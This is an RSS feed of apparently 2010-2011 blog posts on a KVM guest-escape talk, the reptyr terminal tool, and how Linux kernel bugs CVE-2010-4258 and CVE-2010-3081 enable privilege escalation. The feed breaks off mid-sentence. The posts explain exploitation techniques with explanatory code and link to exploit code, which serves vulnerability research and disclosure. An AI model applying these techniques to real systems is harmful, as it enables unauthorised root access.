<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; linux</title>
	<atom:link href="http://blog.nelhage.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>BlackHat/DEFCON 2011 talk: Breaking out of KVM</title>
		<link>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/</link>
		<comments>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 17:32:29 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[DEFCON]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kvm]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=474</guid>
		<description><![CDATA[I&#8217;ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux. Virtunoid: Breaking out of KVM [Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve posted <a href="http://nelhage.com/talks/kvm-defcon-2011.pdf">the final slides</a> from my talk this year at <a href="http://defcon.org/">DEFCON</a> and <a href="http://blackhat.com/">Black Hat</a>, on breaking out of the <a href="http://www.linux-kvm.org/page/Main_Page">KVM</a> Kernel Virtual Machine on Linux.</p>

<div style="width:425px; margin:auto; padding: 1em" id="__ss_8908773"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/NelsonElhage/virtunoid-breaking-out-of-kvm" title="Virtunoid: Breaking out of KVM">Virtunoid: Breaking out of KVM</a></strong><object id="__sse8908773" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse8908773" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object></div>

<p><b>[Edited 2011-08-11]</b> The <a href="https://github.com/nelhage/virtunoid">code is now available</a>. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up and running in a local test environment, if you&#8217;re so inclined.</p>

<p>In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I&#8217;m also going to clean that up and release it, but don&#8217;t expect it too soon.</p>

<p>I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I&#8217;d met online and others I hadn&#8217;t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>reptyr: Changing a process&#8217;s controlling terminal</title>
		<link>http://blog.nelhage.com/2011/02/changing-ctty/</link>
		<comments>http://blog.nelhage.com/2011/02/changing-ctty/#comments</comments>
		<pubDate>Wed, 09 Feb 2011 03:06:50 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[termios]]></category>
		<category><![CDATA[tty]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=461</guid>
		<description><![CDATA[reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of [...]]]></description>
			<content:encoded><![CDATA[<p><a href="https://github.com/nelhage/reptyr">reptyr</a> (<a href="http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/">announced</a> recently on this blog) takes a
process that is currently running in one terminal, and transplants it
to a new terminal. <code>reptyr</code> comes from a proud family of similar
hacks, and works in the same basic way: We use <a href="http://linux.die.net/man/2/ptrace"><code>ptrace(2)</code></a>
to attach to a target process and force it to execute code of our own
choosing, in order to open the new terminal, and <code>dup2(2)</code> it over
stdout and stderr.</p>

<p>The main special feature of <code>reptyr</code> is that it actually changes the
controlling terminal of the target process. The &#8220;controlling terminal&#8221;
is a concept maintained by UNIX operating systems that is independent
of a process&#8217;s file descriptors. The controlling terminal governs
details like where <code>^C</code> gets delivered, and how applications are
notified of changes in window size.</p>

<p>Processes are grouped into two levels of hierarchical groups:
sessions, and process groups. Each group is named by an ID, which is
the PID of the initial <strong>leader</strong> (either &#8220;session leader&#8221; or &#8220;process
group leader&#8221;). Even if the leader exits, that number is still the ID
for the group. Sessions are used for terminal management &#8212; Every
process in a session has the same controlling terminal, and each
terminal belongs to at most one session. Process groups are a
sub-division within sessions, and are used primarily for job control
within the shell. For a more in-depth explanation, see <a href="http://blog.nelhage.com/2010/01/a-brief-introduction-to-termios-signaling-and-job-control/">part
3</a> of my earlier series on termios.</p>

<p>If you check out <code>tty_ioctl(4)</code>, you&#8217;ll find that Linux has an
<code>ioctl</code>, <code>TIOCSCTTY</code>, that can be used to set the controlling terminal
of a process, and you could be forgiven for thinking that all we need
is to make the target call that ioctl, and we&#8217;re done.</p>

<p>However, if we read closer, we find that it has several
restrictions. In particular:</p>

<blockquote>
  <p>The calling process must be a session leader and not have a
  controlling terminal already.  If this terminal is already the
  controlling terminal of a different session group then the ioctl fails
  with EPERM […]</p>
</blockquote>

<p>In the typical case, where we&#8217;re trying to attach a (say) <code>mutt</code> that
was spawned from a shell, <code>mutt</code> won&#8217;t be a session leader: the
shell will be the session leader, and <code>mutt</code> will be the process group
leader for a process group containing only itself.</p>

<p>So, we need to make the target a session leader. Conveniently, there&#8217;s
a system call for that: <code>setsid(2)</code>.</p>

<p>However, reading that man page, we find a new caveat: <code>setsid(2)</code>
fails with <code>EPERM</code> if</p>

<blockquote>
  <p>The process group ID of any process equals the PID of the calling
  process.  Thus, in particular, setsid() fails if the calling process
  is already a process group leader.</p>
</blockquote>

<p>The shell creates a new process group for every job you launch, and so
our target <code>mutt</code> will be a process group leader, and unable to
<code>setsid()</code>. The usual solution for programs that want to setsid is to
<code>fork()</code>, so that the child is still in the parent&#8217;s session and
process group, and then <code>setsid()</code> in the child. However, <code>fork()</code>ing
our <code>mutt</code> and killing off the parent seems potentially disruptive, so
let&#8217;s see if we can avoid that.</p>

<p>So, we&#8217;re going to need to change <code>mutt</code>&#8217;s process group ID, so that
there are no processes with process group IDs equal to its
PID. Following some trusty <em><code>SEE ALSO</code></em> links, we get to
<code>setpgid(2)</code>. There&#8217;s a bunch of text in that man page, but the key
bit is:</p>

<blockquote>
  <p>If setpgid() is used to move a process from one process group to
  another, both process groups must be part of the same session (see
  setsid(2) and credentials(7)).  In this case, the pgid specifies an
  existing process group to be joined and the session ID of that group
  must match the session ID of the joining process.</p>
</blockquote>

<p>We need to find a process group in the same session as <code>mutt</code> to move
our <code>mutt</code> into, and then we&#8217;ll be able to <code>setsid</code>. We could try to
find one &#8212; the shell is a plausible candidate, for instance &#8212; but
there&#8217;s an alternate, more direct route: Create one.</p>

<p>While we have <code>mutt</code> captured with <code>ptrace</code>, we can make it <code>fork(2)</code>
a dummy child, and start tracing that child, too. We&#8217;ll make the child
<code>setpgid</code> to make it into its own process group, and then get <code>mutt</code>
to <code>setpgid</code> itself into the child&#8217;s process group. <code>mutt</code> can then
<code>setsid</code>, moving into a new session, and now that it is a session leader,
it can finally call <code>ioctl(TIOCSCTTY)</code> on the new terminal, and we win.</p>
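
<p>As a rough illustration of that sequence, here is a minimal sketch that runs the same dance on the calling process itself, with no <code>ptrace</code> involved. It is not reptyr&#8217;s actual code: <code>become_session_leader</code> and <code>take_controlling_tty</code> are hypothetical helper names, and the early return for a process that is already a session leader is an assumption added so the sketch is safe to call anywhere.</p>

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: make the calling process a session leader without
 * replacing it by a forked copy. Returns 0 on success, -1 on failure. */
int become_session_leader(void)
{
    if (getsid(0) == getpid())
        return 0;                 /* already a session leader, nothing to do */

    pid_t child = fork();
    if (child < 0)
        return -1;
    if (child == 0) {
        setpgid(0, 0);            /* dummy child leads a fresh process group */
        for (;;)
            pause();              /* idle until the parent kills us */
    }

    int rc = -1;
    /* Set the child's group from the parent as well, so we do not race
     * with the child's own setpgid() call. */
    if (setpgid(child, child) == 0 &&
        setpgid(0, child) == 0 &&         /* leave our own process group */
        setsid() != (pid_t)-1)            /* now allowed: no group carries our PID */
        rc = 0;

    kill(child, SIGKILL);         /* the dummy child has served its purpose */
    waitpid(child, NULL, 0);
    return rc;
}

/* Hypothetical helper: claim tty_fd as the controlling terminal.
 * Only works for a session leader that has no controlling terminal. */
int take_controlling_tty(int tty_fd)
{
    return ioctl(tty_fd, TIOCSCTTY, 0);
}
```

<p>A caller would run <code>become_session_leader()</code> first and then pass an open terminal descriptor to <code>take_controlling_tty()</code>. The sketch assumes no other process is still in a group named after the caller&#8217;s PID; if one is, <code>setsid()</code> fails with <code>EPERM</code>, as the man page quoted above describes.</p>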

<p>It turns out I didn&#8217;t invent this technique &#8212; <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a> and
<a href="http://caca.zoy.org/wiki/neercs">neercs</a> work the same way. But I did discover it
independently of them, and it was a fun little hunt through unix
arcana.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/02/changing-ctty/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>reptyr: Attach a running process to a new terminal</title>
		<link>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/</link>
		<comments>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/#comments</comments>
		<pubDate>Sat, 22 Jan 2011 01:56:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[screenify]]></category>
		<category><![CDATA[termios]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=450</guid>
		<description><![CDATA[Over the last week, I&#8217;ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don&#8217;t want to interrupt it? Just start a screen, use reptyr to grab it, [...]]]></description>
			<content:encoded><![CDATA[<p>Over the last week, I&#8217;ve written a nifty tool that I call
<a href="http://github.com/nelhage/reptyr">reptyr</a>. reptyr is a utility for taking an existing running
program and attaching it to a new terminal. Started a long-running
process over ssh, but have to leave and don&#8217;t want to interrupt it?
Just start a screen, use reptyr to grab it, and then kill the ssh
session and head on home.</p>

<p>You can <a href="http://github.com/nelhage/reptyr">grab the source</a>, or read on for some more details.</p>

<p>There&#8217;s a shell script called <a href="http://tomaw.net/tmp/screenify">screenify</a> that&#8217;s been going
around the internet for nigh on 10 years now that is supposed to use
gdb to accomplish the same thing. There&#8217;s also a project called
<a href="http://pasky.or.cz/~pasky/dev/retty/">retty</a> that tries to do the same thing, in C using <code>ptrace()</code>
directly.</p>

<p>The difference between those programs and reptyr is that reptyr works
much, much better.</p>

<p>If you attach a <code>less</code> using screenify or retty, it will still take
input from the old terminal. If you attach an ncurses program, and
resize the window, the program probably won&#8217;t resize correctly. <code>^C</code>
and <code>^Z</code> will still be processed on the old terminal &#8212; typing them in
the new terminal won&#8217;t do anything useful.</p>

<p>reptyr fixes all of these problems and more, and is the only such tool
I know of that does so. I&#8217;ve never seen a program that doesn&#8217;t behave
noticeably incorrectly after attaching with retty or screenify,
whereas with reptyr most programs I have tried work flawlessly.</p>

<h2>How does it work?</h2>

<p><code>reptyr</code> works in the same basic way as <code>screenify</code> and <code>retty</code> &#8212; it
attaches to the target process using the <code>ptrace</code> API, opens the new
terminal, and <code>dup2</code>s it over the old file descriptors. It also copies
the termios settings from the old terminal to the new terminal.</p>

<p>The main thing that reptyr does that no one else does is that it
actually changes the controlling terminal of the process you are
attaching. This is the detail that makes many things Just Work,
including <code>^C</code> and <code>^Z</code> and window resizing.</p>

<p>Switching the target&#8217;s controlling terminal is not easy and involves a
fair bit of trickery with <code>ptrace</code> and Linux&#8217;s terminal APIs. I will
probably do another blog post some time about the dirty details of how
I make this work, but for now you can check out
<a href="https://github.com/nelhage/reptyr/blob/master/attach.c">attach.c</a> if
you really want to know.</p>

<p>reptyr still has a number of limitations &#8212; it doesn&#8217;t generally work,
for example, if the target process has any children. I know how to fix
most of these problems, though, so expect it to get better with
time. Please let me know if you find it useful!</p>

<h2>Appendix</h2>

<p>(Edited to add:) Nothing is really new. A commenter on reddit pointed out that <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a>
and <a href="http://caca.zoy.org/wiki/neercs">neercs</a> both accomplish the same thing, even using the same trick
to change the CTTY. Ah well, I had fun writing it anyway, and apparently I
wasn&#8217;t the only one who didn&#8217;t know about the existing alternatives. <code>neercs</code> is a full screen replacement, though, and I think that reptyr should be more robust than <code>injcode</code> (I use a different technique for <code>ptrace</code>-hijacking, for example), and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I&#8217;ve seen for this tool, this still isn&#8217;t a problem that is solved to the average user&#8217;s satisfaction.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/feed/</wfw:commentRss>
		<slash:comments>42</slash:comments>
		</item>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation exploit for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
			<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation exploit
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer, so we use
<code>set_fs()</code> to effectively temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, it attempts to clean up, and
then kills the current process by calling the <code>do_exit()</code>
function.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was in before the oops occurred, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>
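
<p>To make the interaction concrete, here is a toy userspace model of it. Nothing here is kernel code: the <code>toy_</code> names, the two limit constants, and the function that stands in for the oops path are all assumptions invented for illustration. The only point is that the same range check passes or fails depending on which address limit happens to be in force when the exit-time write runs.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Assumed limits for illustration; the real values are architecture-specific. */
#define TOY_USER_DS   UINT64_C(0x00007ffffffff000)
#define TOY_KERNEL_DS UINT64_MAX

/* Stand-in for the per-task address limit that set_fs() changes. */
static uint64_t toy_addr_limit = TOY_USER_DS;

/* Toy access_ok(): accept [addr, addr + size) only if it lies below the limit. */
int toy_access_ok(uint64_t addr, uint64_t size)
{
    return size <= toy_addr_limit && addr <= toy_addr_limit - size;
}

/* Toy put_user(): 0 if the write would be allowed, -1 (think -EFAULT) if not. */
int toy_put_user_allowed(uint64_t addr)
{
    return toy_access_ok(addr, sizeof(int)) ? 0 : -1;
}

/* Toy exit path: the write to clear_child_tid runs under whatever limit was
 * active when the task died. If it oopsed between set_fs(KERNEL_DS) and the
 * restoring set_fs(old_fs), that limit is still TOY_KERNEL_DS. */
int toy_exit_write_after_oops(uint64_t clear_child_tid, int oops_under_kernel_ds)
{
    uint64_t saved = toy_addr_limit;
    if (oops_under_kernel_ds)
        toy_addr_limit = TOY_KERNEL_DS;
    int rc = toy_put_user_allowed(clear_child_tid);
    toy_addr_limit = saved;      /* reset so the model can be reused */
    return rc;
}
```

<p>In this model a kernel-range address such as <code>0xffffffff81000000</code> is rejected on a normal exit and accepted once the limit has been left at <code>TOY_KERNEL_DS</code>.</p>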

<h2><code>splice()</code> et al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. A handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>
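
<p>For readers who have not used it, here is a small, benign sketch of what a <code>splice()</code> call from a pipe into a socket looks like from userspace. The helper names are hypothetical, and the <code>AF_UNIX</code> socket pair is just a convenient destination chosen for the example; it says nothing about which code path the kernel takes for any particular socket type.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: stage len bytes of msg in a pipe, then splice()
 * them into sock. Returns the number of bytes spliced, or -1 on error. */
ssize_t splice_into_socket(int sock, const char *msg, size_t len)
{
    int p[2];
    if (pipe(p) < 0)
        return -1;

    ssize_t n = -1;
    if (write(p[1], msg, len) == (ssize_t)len)
        n = splice(p[0], NULL, sock, NULL, len, 0);   /* pipe -> socket */

    close(p[0]);
    close(p[1]);
    return n;
}

/* Hypothetical helper: splice msg into one end of a socket pair and read it
 * back from the other end. Returns the number of bytes read, or -1. */
ssize_t splice_roundtrip(const char *msg, char *out, size_t outlen)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;

    ssize_t n = splice_into_socket(sv[0], msg, strlen(msg));
    if (n > 0)
        n = read(sv[1], out, outlen);

    close(sv[0]);
    close(sv[1]);
    return n;
}
```

<p>One end of the transfer must be a pipe, which is why the data is staged through one first.</p>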

<p>As of 2.6.31, attempts to <code>splice()</code> to or from an fd that doesn&#8217;t
support special handling to actually do zero-copy <code>splice</code>, will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using set_fs() in order to pass in kernel
buffers.</p>

<p>What that means is that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendmsg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Some notes on CVE-2010-3081 exploitability</title>
		<link>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/</link>
		<comments>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/#comments</comments>
		<pubDate>Tue, 30 Nov 2010 16:58:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[cve-2010-3081]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=401</guid>
		<description><![CDATA[Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered and announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time. While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE [...]]]></description>
			<content:encoded><![CDATA[<p>Most of you reading this blog probably remember
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a>. The bug got an awful lot of publicity when it
was discovered and announced, due to allowing local privilege
escalation against virtually all 64-bit Linux kernels in common use at
the time.</p>

<p>While investigating CVE-2010-3081, I discovered that several of the
commonly-believed facts about the CVE were wrong, and it was even more
broadly exploitable than was publicly documented. I&#8217;d like to share
those observations here.</p>

<h2>A brief review of the bug</h2>

<p>The bug arose from the <code>compat_alloc_user_space</code> function in Linux&#8217;s
32-bit compatibility support on 64-bit
systems. <code>compat_alloc_user_space</code> allocates and returns space on the
userspace stack for the kernel to use:</p>

<pre><code>static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs-&gt;sp - len;
}
</code></pre>

<p>This function is only called by compat-mode syscalls, so <code>current</code> is assumed to
be a 32-bit process, in which case <code>regs-&gt;sp</code>, the user stack pointer, will be a
32-bit quantity. Thus, if we subtract a small <code>len</code>, the result should still fit
in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the
user address space.</p>

<p>Because of this, some callers of <code>compat_alloc_user_space</code> were lazy, and did
not call <code>access_ok</code> (or a function which called <code>access_ok</code>) to check that the
result of <code>compat_alloc_user_space</code> fell within the user address space.</p>

<p>However, it turned out that some call sites in the kernel called
<code>compat_alloc_user_space</code> with a user-controlled <code>len</code> value, allowing the
subtraction to wrap around. On a 64-bit system, the kernel lives in the top four
gigabytes of memory, and so this wraparound is enough for a user to cause
<code>compat_alloc_user_space</code> to return a pointer into the kernel&#8217;s address space.</p>
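
<p>The wraparound is easy to see with concrete numbers. The sketch below is a userspace model of the arithmetic only: the <code>toy_</code> functions are hypothetical, the types are simplified to unsigned 64-bit integers, and <code>TOY_USER_TOP</code> is an assumed boundary picked for illustration rather than a value taken from any kernel header.</p>

```c
#include <assert.h>
#include <stdint.h>

/* Assumed user/kernel boundary, for illustration only. */
#define TOY_USER_TOP UINT64_C(0x00007ffffffff000)

/* Same arithmetic as compat_alloc_user_space(): stack pointer minus length. */
uint64_t toy_compat_alloc_user_space(uint64_t sp, uint64_t len)
{
    return sp - len;    /* unsigned subtraction wraps modulo 2^64 */
}

/* The kind of range check the lazy callers skipped. */
int toy_points_to_userspace(uint64_t ptr, uint64_t size)
{
    return size <= TOY_USER_TOP && ptr <= TOY_USER_TOP - size;
}
```

<p>With a 32-bit stack pointer of <code>0xffffd000</code>, a small <code>len</code> of <code>0x100</code> gives <code>0xffffcf00</code>, which is still a user address. A <code>len</code> of <code>0xffffe000</code> is larger than the stack pointer, so the subtraction wraps to <code>0xfffffffffffff000</code>, in the top four gigabytes, and the range check rejects it.</p>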

<p>Moreover, it turned out that the functions that used a user-controlled <code>len</code>
also did not check <code>access_ok</code> on the result of the allocation. In particular,
Linux 2.6.26 introduced the <code>compat_mc_getsockopt</code> function, which called
<code>compat_alloc_user_space</code> with a user-controlled length and then copied
user-controlled data to this pointer. It is this function which the public
exploit targeted.</p>

<h2>Disabling 32-bit binaries doesn&#8217;t help</h2>

<p>When an <a href="http://www.seclists.org/fulldisclosure/2010/Sep/268">exploit</a> was released for this bug, many sources
circulated a <a href="https://access.redhat.com/kb/docs/DOC-40265">mitigation</a>: Disable 32-bit binaries on a
system. Prevent compat-mode processes from running, the logic goes,
and you prevent anyone from making a compat-mode syscall that triggers
the vulnerable path.</p>

<p>This mitigation indeed prevented the public exploit from working (it
included 32-bit inline assembly, and so couldn&#8217;t even easily be
recompiled as a 64-bit binary), and many observers seemed to believe
it closed the bug entirely.</p>

<p>However, this was not the case! It turns out, on an <code>amd64</code> system, a
64-bit process can still make a compat-mode system call using the <code>int
$0x80</code> instruction, which is the traditional 32-bit syscall mechanism!
Even though the process is running in 64-bit mode, <code>int $0x80</code>
redirects to the compat-mode syscall table.</p>

<p>After realizing this, modifying the public exploit to work when
compiled in 64-bit mode was a simple matter of porting the inline
assembly, and changing a small handful of types. I&#8217;ve posted the
modified <a href="http://nelhage.com/files/abftw_64.c">exploit</a> and the <a href="http://nelhage.com/files/abftw.diff">diff</a> against the original
for the curious.</p>

<h2>The integer overflow is totally irrelevant</h2>

<p>Once you&#8217;ve realized that you can make compat-mode system calls from a 64-bit
process, a little bit of thought reveals something else
interesting. <code>compat_alloc_user_space</code> subtracts the <code>len</code> value off of the
userspace stack pointer. Previously, we relied on subtracting a large value from
a 32-bit stack pointer in order to end up with a kernel pointer. However, while
a 32-bit process is limited to a 32-bit stack pointer, a 64-bit process can write a full
64-bit value into <code>%rsp</code>, and thus <code>regs-&gt;sp</code>! There&#8217;s no need for underflow at
all &#8212; you can just write a 64-bit value into <code>%rsp</code> and do an <code>int $0x80</code>, and
